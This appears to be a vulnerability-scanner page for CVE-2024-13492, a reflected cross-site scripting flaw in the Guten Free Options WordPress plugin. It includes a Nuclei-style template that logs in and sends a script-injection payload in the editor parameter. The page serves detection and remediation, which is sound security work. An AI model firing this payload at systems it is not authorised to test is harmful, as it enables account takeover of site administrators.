
Guten Free Options - Cross Site Scripting

CVE-2024-13492
Verified

Description

Guten Free Options WordPress plugin <= 0.9.5 contains a reflected cross-site scripting vulnerability caused by unsanitized parameter output, letting attackers execute malicious scripts in high-privilege users' browsers. Exploitation requires the victim to click a malicious link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

2%

Affected Product

guten_free_options

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-13492.yaml
id: CVE-2024-13492

info:
  name: Guten Free Options - Cross Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Guten Free Options WordPress plugin <= 0.9.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/a4a75b75-4801-4ed4-bcc6-4874ac169562/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13492
    cwe-id: CWE-79
    epss-score: 0.02463
    epss-percentile: 0.85431
    cpe: cpe:2.3:a:wordquest:guten_free_options:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordquest
    product: guten_free_options
  tags: cve,cve2024,wordquest,guten-free-options,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=page&editor=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 490a004630440220597dbb7168ee73df09062172c3fa4a3568aed93da74f7f23aa5e90748b39989202204564e4db9100459d853251fae5b477ba9d34177b0e50e3d7fe91dfd2a93f59bf:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13492
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/a4a75b75-4801-4ed4-bcc6-4874ac169562/

Remediation Steps

Update to the latest version of the plugin where the issue is fixed.